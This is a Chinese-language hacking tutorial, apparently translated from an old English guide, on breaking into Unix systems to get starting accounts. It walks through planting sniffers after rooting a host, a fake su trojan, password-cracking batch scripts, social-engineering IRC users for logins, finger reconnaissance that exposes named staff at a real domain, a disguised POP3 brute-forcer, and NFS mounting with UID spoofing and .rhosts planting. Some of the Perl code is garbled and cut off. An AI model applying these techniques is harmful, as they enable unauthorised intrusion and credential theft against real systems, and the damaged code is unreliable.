有很多方法可以获得一个起始帐号.我将深入每个方面帮助你开始.你所需的只是一个好的帐号,用来获得数百个帐号.想一想这:你进入一个很好的可以利用的系统(大多是Linux机器;),夺取root权限并装上一个Sniffer(嗅探器);这个TCP sniffer 将监测到网络上任何login(登陆)过程并记录下所有Telnet,Ftp或拨号进出的Login 名和口令;这样即使是一个小以太网你也可获得大约100个口令,如果是一个更大的网络供应商你就会得到全世界的数百个帐号!这一切,你只要有某个可利用系统的一个好帐号和口令就可做到!如果你看起来无法利用某系统的root权限,那就拿它来破解口令,用来和那些但没有shell帐号或磁盘空间的其他hacker及IRC使用者交换.决不要把一个你有root权限的系统的口令给出去!你自己留着它!
破解passwd 文档
Fake SU by Nfin8 - i-e
IRC: /msg i-e
Easy as 1,2,3 ...
gcc su.c -o su
.bash_profile 结构如下:
# .bash_profile
# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
# User specific environment and startup programs
你可在/etc目录下的passwd文档前部找到管理员的用户名.只需打:more passwd
历史文档在每个用户目录里.通过阅读它们,你可看到该用户最近使用过的命令,有时能看到最近的100多个命令.寻找.bash_history或history文件,你可用more命令读它们:more .bash_history,也可:more .b*或more .b(然后按键盘上的Tab键).
OK,现在你需要一个好的password破解程序.下一章你可看到在没有帐号时如何从系统夺取password文档.但是it is catch 22(我不懂了?:译者),你还是要用到password破解程序.
1. Password破解程序
2. 好的字典档
3. Password 文档
此外还要找一些好字典档.最好的字典档就是名字(names)了.你会在网络上发现最不可靠的口令如男孩的女友名,女孩的男友名啦:)象如'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords'’ hackersdict’这样为名的字典档是最好的.
Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark
PWfile(s) : domain.com.passwd
Wordfile : domain.com.passwd
上面把password文档作为字典档.这会让你先找出那些用登陆名(Login name)作口令的用户,如果用真名(real name )或公司名之类的信息的话,也能马上猜中.这样你就不用苦苦等候程序搜索整个字典档了.
------------ start of dicthash.bat
@echo off
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your dict and
echo - password file. Then use this batch file using the following format:
echo -
echo - dicthash.bat dictfilename.ext passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - dicthash will first load jack running the dict file against your
echo - password file in both cases, then it will add numbers 0-9 both to
echo - the begining and end of every dict word. This will take a while,
echo - so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)
jpp -lower %1 | jack -stdin %2
jpp %1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
---------------- end of dicthash.bat
---------------- start of jackhash.bat
@echo off
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your password file.
echo - Then use this batch file using the following format:
echo -
echo - jackhash.bat passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - jackhash will first load jack running the passwd file against
echo - itself in both upper and lower cases, then it will add numbers 0-9
echo - both to the begining and end of every dict word. This will take
echo - a while, so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)
jpp -gecos:5 -lower %1 | jack -stdin %1
jpp -gecos:5 %1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
--------------- end of jackhash.bat
还有其他方法不用费那么大力就可获得帐号.在IRC上建一与hacking有关名字的频道等候或加入已有的IRC频道,如:#hacking #unix #unixhacking #hack #hackers #hacker #virus #virii
用/msg发消息给他使得其他人看不出你和他交谈.然后问他问题,尝试帮助他,但不必太尽力;).最后告诉他你可为他login上去帮他解决问题.这有可能让你拿到passwd 文档或其他东东.应承他任何事(promise him the world)以获取login口令.现在你不就有了起始帐号可以开始你的学习进程了.如果在夺取系统的root时候你不想暴露自己,可告诉他其他吸引他的东东让他在你侦听系统的其他口令时忙着.
finger @domainname.com 我用真正的域名:
[10:35am][/home/ii]finger @starnet.net
Login Name Tty Idle Login Time Office Office Phone
chris Chris Myers p2 4:46 Jan 27 11:19
mike Mike Suter p1 4:57 Jan 22 16:14
mike Mike Suter p5 3d Jan 16 15:35
root System Administrator p3 4:59 Jan 16 10:17
wendt Catherine Wendt-Bern p0 3 Jan 21 14:49
Login:chris Passwword 试一试:Chris,chris,myers,Myers,chrismyers,等等…
[10:35am][/home/ii]finger -l @starnet.net
Login: mike Name: Mike Suter
Directory: /usra/staff/mike Shell: /bin/csh
On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net
On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox
Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk
No Plan.
Login: root Name: System Administrator
Directory: /root Shell: /bin/csh
On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net
Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net
Mail forwarded to:
#\chris@admin.starnet.net, \mike@admin.starnet.net
No Plan.
Login: wendt Name: Catherine Wendt-Bernal
Directory: /usra/staff/wendt Shell: /bin/csh
On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout
No Plan.
----- cut here
/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT 110
/* What we want our program to be masked as, so nosy sys admin's don't kill us */
#define MASKAS "vi"
/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT 0
----- cut here
你也可自己写一小perl脚本程序,能自动finger 列表中的域名并记录响应信息到文件中,finger完后返回并尝试使用pop3端口,以 用户名-用户名(或其他信息)方式(译注:即口令用用户名或其他信息)登陆,记录响应信息到另一文件中.(这就是Emailcrk的原理)
"perl getdomain.pl com.zone com >com.all"
perl getdomain.pl edu.zone edu >edu.all
下面是perl 脚本:
---- cut here
# GetDomain By Nfin8 / Invisible Evil
# Questions /msg i-e or /msg i^e
# Retrieve command line arguments.
my($inputfile, $domain) = @ARGV;
usage() if (!defined($inputfile) || !defined($domain));
# Open and preprocess the input file.
open(INFILE, ";
# Initialize main data structure.
my(%hash) = {};
my($key) = "";
foreach (@lines) {
$key = (split(/\ /))[0];
next if ((($key =~ tr/.//) < 1) ||
(uc($domain) ne uc(((split(/\./, $key))[-1]))) ||
($key =~ m/root-server/i));
$hash ;
# Close input file and output data structure to STDOUT.
foreach (sort(keys(%hash))) {
print "?用户名:@HackBase.net密?码:
sub usage {
print("Usage: getdomain [inputfile] [search]\n\n");
print("Where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n");
---- cut here - end of script -----
要使用上述脚本,你只需把上面几行copy下来命名为getdomain.pl,拷贝到unix系统中,运行: chmod x getdomain.pl
$root> showmount -e wwa.com
ount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive
$root> showmount -e seva.net
Export list for seva.net:
/var/mail pluto.seva.net
/home/user1 pluto.seva.net
/usr/local pluto.seva.net,rover.seva.net
/export/X11R6.3 rover.seva.net
/export/rover rover.seva.net,pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone)
注意上面的“everyone”,如果我们想从这家伙里安装linux 的话会很好.但我们是想打开用户的目录...所以继续下一个:
$root> showmount -e XXXXX.XXX ) {
print "Now checking:?用户名:@HackBase.net密?码:
# Note difference in program output capture from "geturl.pl".
open (EXECFILE, "$program?用户名:@HackBase.net密?码:
@execResult = ;
next if (!defined($execResult[0]));
if ($execResult[0] =~ /^Export/) {
print " - Export list saved.";
open (OUTFILE, ">?用户名:@HackBase.net密?码:
foreach (@execResult) {
print OUTFILE;
close (OUTFILE);
print "\n";
# We are done. Close all files and end the program.
----------------- end of cmount.pl
假设我们运行showmount -e domain.com 并返回:
Export list for domain.com:
/ (everyone)
/p1 (everyone)
/p2 (everyone)
/p3 (everyone)
/p5 (everyone)
/p6 (everyone)
/p7 (everyone)
/var/spool/mail titan,europa,galifrey
/tmp (everyone)
我们想连接(mount) / 目录..哟呵…这家伙把整个系统都共享(mountable)了
$root> mkdir /tmp/mount
root> mount -nt nfs domain.com:/ /tmp/mount
$root> mount -nt nfs domain.com:/home /tmp/mount
$root> umount /tmp/mount
bash# ls -al /mnt ; 确定/mnt是空的
ls: /mnt: No such file or directory ; 不存在这样的文件或目录 ;)
bash# mkdir /mnt ; 让我们为他建一个(/mnt目录)
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; 开始 mount 这小家伙 ...
bash# cd /mnt ; 进入mounted的目录.
bash# ls ; 简单的dir ..
TT_DB home raddb share
back local radius-961029.gz www
exec lost found radius-961029.ps
bash# ; the home dir就在那了 ... oh 很好...
bash# cd home
bash# ls -l ; 列长目录... 这儿tom 看起来不错 ;)
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 302 other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 viewx
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash# ; 注意到tom 是 302号使用者 ... hmmm 把他放进我们的passwd 文档中.
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash ; 搞定 ;)
bash# su - tom ; su 到 tom 帐号 ...
bash$ ls -l
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 tom other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 view
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash$ ; 注意上面,toms 的用户号没有了... 现在我们拥有了他的目录!
bash$ echo >>tom/.rhosts ; 在tom的目录里建一个名为 .rhosts 的文档
(bash$ ;在.rhosts中加入 号,每个人都能用rlogin到他的帐户。)
bash$ rlogin xxxxx.xxx 在我们的机器上我们是tom了 , 因此rlogin 上平台.
Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx
Sun Microsystems Inc. SunOS 5.5 Generic November 1995
> 雅皮士们 ,我们进去了!
> ls -al
total 8
drwxr-xr-x 2 tom group 512 Mar 1 17:10 .
drwxr-xr-x 14 tom group 512 Jan 24 11:16 ..
-rw-r--r-- 1 tom group 144 Dec 30 15:32 .profile
-rw-r--r-- 1 tom bin 8 Mar 11 08:26 .rhosts